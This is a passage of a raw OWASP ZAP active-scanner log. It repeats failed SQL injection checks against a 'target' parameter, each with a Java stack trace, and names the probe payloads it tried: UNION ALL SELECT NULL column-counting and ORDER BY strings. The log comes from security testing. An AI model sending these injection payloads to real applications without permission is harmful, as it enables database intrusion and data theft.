org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685494 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685496 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685497 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685498 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685499 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685500 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685502 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 9254-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685503 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685505 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685506 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685508 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685509 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685511 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685512 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685513 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685514 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 